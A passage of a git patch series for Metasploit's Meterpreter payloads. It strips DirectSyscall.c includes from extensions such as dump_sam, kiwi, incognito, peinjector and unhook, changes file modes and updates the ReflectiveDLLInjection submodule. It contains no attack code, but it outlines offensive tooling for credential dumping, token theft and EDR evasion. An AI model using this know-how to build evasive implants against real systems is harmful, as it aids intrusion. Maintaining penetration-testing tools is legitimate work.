c/meterpreter/source/extensions/priv/elevate.c | 0 c/meterpreter/source/extensions/priv/elevate.h | 0 c/meterpreter/source/extensions/priv/namedpipe_efs.c | 0 c/meterpreter/source/extensions/priv/priv.c | 1 - c/meterpreter/source/extensions/priv/priv.rc | 0 c/meterpreter/source/extensions/priv/resource.h | 0 c/meterpreter/source/extensions/python/python_commands.c | 0 c/meterpreter/source/extensions/python/python_commands.h | 0 c/meterpreter/source/extensions/python/python_main.c | 1 - .../source/extensions/python/python_meterpreter_binding.c | 0 c/meterpreter/source/extensions/sniffer/sniffer.c | 1 - c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c | 0 c/meterpreter/source/extensions/stdapi/server/stdapi.c | 1 - c/meterpreter/source/extensions/stdapi/stdapi.h | 0 c/meterpreter/source/extensions/unhook/unhook.c | 1 - c/meterpreter/source/extensions/winpmem/winpmem.cpp | 0 c/meterpreter/source/extensions/winpmem/winpmem.h | 0 c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp | 1 - c/meterpreter/source/metsrv/metsrv.c | 1 - c/meterpreter/source/metsrv/metsrv.h | 0 c/meterpreter/source/metsrv/server_pivot_named_pipe.c | 0 c/meterpreter/source/screenshot/screenshot.c | 1 - 55 files changed, 1 insertion(+), 19 deletions(-) mode change 100755 => 100644 c/meterpreter/source/common/common_command_ids.h mode change 100755 => 100644 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c mode change 100755 => 100644 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h mode change 100755 => 100644 c/meterpreter/source/dump_sam/dump_sam.c mode change 100755 => 100644 c/meterpreter/source/dump_sam/dump_sam.def mode change 100755 => 100644 c/meterpreter/source/elevator/elevator.c mode change 100755 => 100644 c/meterpreter/source/extensions/bofloader/bofloader.c mode change 100755 => 100644 c/meterpreter/source/extensions/espia/espia.c mode change 100755 => 100644 c/meterpreter/source/extensions/extapi/extapi.c mode change 100755 => 100644 c/meterpreter/source/extensions/extapi/ntds.c mode change 100755 => 100644 c/meterpreter/source/extensions/incognito/incognito.c mode change 100755 => 100644 c/meterpreter/source/extensions/lanattacks/lanattacks.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/headers.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpefile.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpefile.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpetool.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpetool.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector_bridge.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector_bridge.h mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell.c mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell.h mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bindings.cpp mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bindings.h mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bridge.cpp mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bridge.h mode change 100755 => 100644 c/meterpreter/source/extensions/priv/elevate.c mode change 100755 => 100644 c/meterpreter/source/extensions/priv/elevate.h mode change 100755 => 100644 c/meterpreter/source/extensions/priv/namedpipe_efs.c mode change 100755 => 100644 c/meterpreter/source/extensions/priv/priv.c mode change 100755 => 100644 c/meterpreter/source/extensions/priv/priv.rc mode change 100755 => 100644 c/meterpreter/source/extensions/priv/resource.h mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_commands.c mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_commands.h mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_main.c mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_meterpreter_binding.c mode change 100755 => 100644 c/meterpreter/source/extensions/sniffer/sniffer.c mode change 100755 => 100644 c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c mode change 100755 => 100644 c/meterpreter/source/extensions/stdapi/stdapi.h mode change 100755 => 100644 c/meterpreter/source/extensions/unhook/unhook.c mode change 100755 => 100644 c/meterpreter/source/extensions/winpmem/winpmem.cpp mode change 100755 => 100644 c/meterpreter/source/extensions/winpmem/winpmem.h mode change 100755 => 100644 c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp mode change 100755 => 100644 c/meterpreter/source/metsrv/metsrv.c mode change 100755 => 100644 c/meterpreter/source/metsrv/metsrv.h mode change 100755 => 100644 c/meterpreter/source/metsrv/server_pivot_named_pipe.c mode change 100755 => 100644 c/meterpreter/source/screenshot/screenshot.c diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index 77be38083..920db0b6c 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit 77be380836a54218a76d1aadfd3846c1e62f0edd +Subproject commit 920db0b6cbb3fbfcd1cc3e34da3b481998a84a16 diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h b/c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/dump_sam/dump_sam.c b/c/meterpreter/source/dump_sam/dump_sam.c old mode 100755 new mode 100644 index 4250198d3..4e4f90041 --- a/c/meterpreter/source/dump_sam/dump_sam.c +++ b/c/meterpreter/source/dump_sam/dump_sam.c @@ -7,7 +7,6 @@ #define RDIDLL_NOEXPORT #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "ReflectiveLoader.c" diff --git a/c/meterpreter/source/dump_sam/dump_sam.def b/c/meterpreter/source/dump_sam/dump_sam.def old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/elevator/elevator.c b/c/meterpreter/source/elevator/elevator.c old mode 100755 new mode 100644 index aeeade136..cd360f73f --- a/c/meterpreter/source/elevator/elevator.c +++ b/c/meterpreter/source/elevator/elevator.c @@ -17,7 +17,6 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* diff --git a/c/meterpreter/source/extensions/bofloader/bofloader.c b/c/meterpreter/source/extensions/bofloader/bofloader.c old mode 100755 new mode 100644 index 869578620..8e8fe5d6e --- a/c/meterpreter/source/extensions/bofloader/bofloader.c +++ b/c/meterpreter/source/extensions/bofloader/bofloader.c @@ -13,7 +13,6 @@ // Required so that use of the API works. MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! @brief The enabled commands for this extension. */ diff --git a/c/meterpreter/source/extensions/espia/espia.c b/c/meterpreter/source/extensions/espia/espia.c old mode 100755 new mode 100644 index 7ada3666f..06787d0d6 --- a/c/meterpreter/source/extensions/espia/espia.c +++ b/c/meterpreter/source/extensions/espia/espia.c @@ -11,7 +11,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" Command customCommands[] = diff --git a/c/meterpreter/source/extensions/extapi/extapi.c b/c/meterpreter/source/extensions/extapi/extapi.c old mode 100755 new mode 100644 index 85a465074..f78025122 --- a/c/meterpreter/source/extensions/extapi/extapi.c +++ b/c/meterpreter/source/extensions/extapi/extapi.c @@ -10,7 +10,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "window.h" diff --git a/c/meterpreter/source/extensions/extapi/ntds.c b/c/meterpreter/source/extensions/extapi/ntds.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/incognito/incognito.c b/c/meterpreter/source/extensions/incognito/incognito.c old mode 100755 new mode 100644 index af8eeb509..ce97bce7b --- a/c/meterpreter/source/extensions/incognito/incognito.c +++ b/c/meterpreter/source/extensions/incognito/incognito.c @@ -15,7 +15,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" DWORD request_incognito_list_tokens(Remote *remote, Packet *packet); diff --git a/c/meterpreter/source/extensions/kiwi/main.c b/c/meterpreter/source/extensions/kiwi/main.c index 8186e3431..fd47a8552 100755 --- a/c/meterpreter/source/extensions/kiwi/main.c +++ b/c/meterpreter/source/extensions/kiwi/main.c @@ -10,7 +10,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "main.h" diff --git a/c/meterpreter/source/extensions/lanattacks/lanattacks.c b/c/meterpreter/source/extensions/lanattacks/lanattacks.c old mode 100755 new mode 100644 index 476ecf4a2..db69a4fb7 --- a/c/meterpreter/source/extensions/lanattacks/lanattacks.c +++ b/c/meterpreter/source/extensions/lanattacks/lanattacks.c @@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "lanattacks.h" diff --git a/c/meterpreter/source/extensions/peinjector/headers.h b/c/meterpreter/source/extensions/peinjector/headers.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.c b/c/meterpreter/source/extensions/peinjector/libpefile.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpefile.h b/c/meterpreter/source/extensions/peinjector/libpefile.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.c b/c/meterpreter/source/extensions/peinjector/libpeinfect.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect.h b/c/meterpreter/source/extensions/peinjector/libpeinfect.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h b/c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.c b/c/meterpreter/source/extensions/peinjector/libpetool.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/libpetool.h b/c/meterpreter/source/extensions/peinjector/libpetool.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.c b/c/meterpreter/source/extensions/peinjector/peinjector.c old mode 100755 new mode 100644 index cf005be73..6d7bccf38 --- a/c/meterpreter/source/extensions/peinjector/peinjector.c +++ b/c/meterpreter/source/extensions/peinjector/peinjector.c @@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "peinjector_bridge.h" diff --git a/c/meterpreter/source/extensions/peinjector/peinjector.h b/c/meterpreter/source/extensions/peinjector/peinjector.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h b/c/meterpreter/source/extensions/peinjector/peinjector_bridge.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell.c b/c/meterpreter/source/extensions/powershell/powershell.c old mode 100755 new mode 100644 index c9993abd9..a95ca1221 --- a/c/meterpreter/source/extensions/powershell/powershell.c +++ b/c/meterpreter/source/extensions/powershell/powershell.c @@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "powershell_bridge.h" diff --git a/c/meterpreter/source/extensions/powershell/powershell.h b/c/meterpreter/source/extensions/powershell/powershell.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp b/c/meterpreter/source/extensions/powershell/powershell_bindings.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bindings.h b/c/meterpreter/source/extensions/powershell/powershell_bindings.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp b/c/meterpreter/source/extensions/powershell/powershell_bridge.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/powershell/powershell_bridge.h b/c/meterpreter/source/extensions/powershell/powershell_bridge.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/elevate.c b/c/meterpreter/source/extensions/priv/elevate.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/elevate.h b/c/meterpreter/source/extensions/priv/elevate.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/namedpipe_efs.c b/c/meterpreter/source/extensions/priv/namedpipe_efs.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/priv.c b/c/meterpreter/source/extensions/priv/priv.c old mode 100755 new mode 100644 index 6fa39cb5a..36cc04d73 --- a/c/meterpreter/source/extensions/priv/priv.c +++ b/c/meterpreter/source/extensions/priv/priv.c @@ -8,7 +8,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /*! diff --git a/c/meterpreter/source/extensions/priv/priv.rc b/c/meterpreter/source/extensions/priv/priv.rc old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/priv/resource.h b/c/meterpreter/source/extensions/priv/resource.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_commands.c b/c/meterpreter/source/extensions/python/python_commands.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_commands.h b/c/meterpreter/source/extensions/python/python_commands.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/python/python_main.c b/c/meterpreter/source/extensions/python/python_main.c old mode 100755 new mode 100644 index 09a862805..e7d9b8c55 --- a/c/meterpreter/source/extensions/python/python_main.c +++ b/c/meterpreter/source/extensions/python/python_main.c @@ -10,7 +10,6 @@ MetApi* met_api = NULL; #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "python_commands.h" diff --git a/c/meterpreter/source/extensions/python/python_meterpreter_binding.c b/c/meterpreter/source/extensions/python/python_meterpreter_binding.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/sniffer/sniffer.c b/c/meterpreter/source/extensions/sniffer/sniffer.c old mode 100755 new mode 100644 index 44756bf8e..45838ff87 --- a/c/meterpreter/source/extensions/sniffer/sniffer.c +++ b/c/meterpreter/source/extensions/sniffer/sniffer.c @@ -36,7 +36,6 @@ Command customCommands[] = // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){ met_api->packet.transmit_response(hErr, remote, response);return(hErr); } diff --git a/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c b/c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c index 503cd0426..c9f54d2d0 100755 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -9,7 +9,6 @@ MetApi* met_api = NULL; #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" // NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/unhook/unhook.c b/c/meterpreter/source/extensions/unhook/unhook.c old mode 100755 new mode 100644 index 1a7d350a7..381dba3f1 --- a/c/meterpreter/source/extensions/unhook/unhook.c +++ b/c/meterpreter/source/extensions/unhook/unhook.c @@ -6,7 +6,6 @@ #include "common_metapi.h" #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "unhook.h" diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.cpp b/c/meterpreter/source/extensions/winpmem/winpmem.cpp old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/winpmem/winpmem.h b/c/meterpreter/source/extensions/winpmem/winpmem.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp old mode 100755 new mode 100644 index f8646af4e..e85e7bb37 --- a/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp +++ b/c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp @@ -7,7 +7,6 @@ extern "C" { #include "common_metapi.h" #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #ifndef min diff --git a/c/meterpreter/source/metsrv/metsrv.c b/c/meterpreter/source/metsrv/metsrv.c old mode 100755 new mode 100644 index b039e3bc4..93773e661 --- a/c/meterpreter/source/metsrv/metsrv.c +++ b/c/meterpreter/source/metsrv/metsrv.c @@ -10,7 +10,6 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../ReflectiveDLLInjection/inject/src/GetProcAddressR.c" #include "../ReflectiveDLLInjection/inject/src/LoadLibraryR.c" diff --git a/c/meterpreter/source/metsrv/metsrv.h b/c/meterpreter/source/metsrv/metsrv.h old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/metsrv/server_pivot_named_pipe.c b/c/meterpreter/source/metsrv/server_pivot_named_pipe.c old mode 100755 new mode 100644 diff --git a/c/meterpreter/source/screenshot/screenshot.c b/c/meterpreter/source/screenshot/screenshot.c old mode 100755 new mode 100644 index 1a70b6d25..11d49ad52 --- a/c/meterpreter/source/screenshot/screenshot.c +++ b/c/meterpreter/source/screenshot/screenshot.c @@ -9,7 +9,6 @@ #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN #define RDIDLL_NOEXPORT -#include "../ReflectiveDLLInjection/dll/src/DirectSyscall.c" #include "../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" /* From 1556007bfdf1583f3815e41315e6ad507ad23fe0 Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Fri, 12 Jan 2024 19:24:01 +0100 Subject: [PATCH 11/14] Update ReflectiveDLLInjection submodule to pull in Win10/8 x86 fix --- .gitmodules | 2 +- c/meterpreter/source/ReflectiveDLLInjection | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/.gitmodules b/.gitmodules index c9e32c313..0bc9322f8 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,7 +1,7 @@ [submodule "source/ReflectiveDLLInjection"] path = c/meterpreter/source/ReflectiveDLLInjection url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git - branch = direct_syscalls2 + branch = direct_syscalls_fix_win10x86 [submodule "deps"] path = c/meterpreter/deps url = https://github.com/rapid7/meterpreter-deps diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index 920db0b6c..e6d144c06 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit 920db0b6cbb3fbfcd1cc3e34da3b481998a84a16 +Subproject commit e6d144c067a34cc1b5f91fba62fdc123c65fe859 From 83fa146f7523628fb6d01e304446be4eba5d18e1 Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Tue, 16 Jan 2024 18:27:36 +0100 Subject: [PATCH 12/14] Update ReflectiveDLLInjection submodule to pull in new trampoline detection logic --- c/meterpreter/source/ReflectiveDLLInjection | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index e6d144c06..7d38d3757 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit e6d144c067a34cc1b5f91fba62fdc123c65fe859 +Subproject commit 7d38d3757d4305bd5044145fa16ce40aa8761a7a From c7abd47585ae8d59685ca2c394d8313e7b6d19f1 Mon Sep 17 00:00:00 2001 From: Christophe De La Fuente Date: Fri, 19 Jan 2024 17:40:45 +0100 Subject: [PATCH 13/14] Update the ReflectiveDLLInjection submodule to the upstream repository --- .gitmodules | 3 +-- c/meterpreter/source/ReflectiveDLLInjection | 2 +- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/.gitmodules b/.gitmodules index 0bc9322f8..68c4a63e0 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,7 +1,6 @@ [submodule "source/ReflectiveDLLInjection"] path = c/meterpreter/source/ReflectiveDLLInjection - url = https://github.com/cdelafuente-r7/ReflectiveDLLInjection.git - branch = direct_syscalls_fix_win10x86 + url = https://github.com/rapid7/ReflectiveDLLInjection.git [submodule "deps"] path = c/meterpreter/deps url = https://github.com/rapid7/meterpreter-deps diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index 7d38d3757..81cde88be 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection @@ -1 +1 @@ -Subproject commit 7d38d3757d4305bd5044145fa16ce40aa8761a7a +Subproject commit 81cde88bebaa9fe782391712518903b5923470fb From 7ff8ee535f2d29c39c8d176d2d5a7baad1889c06 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 19 Jan 2024 11:20:36 -0600 Subject: [PATCH 14/14] Bump metasploit-payloads to 2.0.166 --- gem/lib/metasploit-payloads/version.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gem/lib/metasploit-payloads/version.rb b/gem/lib/metasploit-payloads/version.rb index c3dc1d272..88e1011d4 100644 --- a/gem/lib/metasploit-payloads/version.rb +++ b/gem/lib/metasploit-payloads/version.rb @@ -1,6 +1,6 @@ # -*- coding:binary -*- module MetasploitPayloads - VERSION = '2.0.165' + VERSION = '2.0.166' def self.version VERSION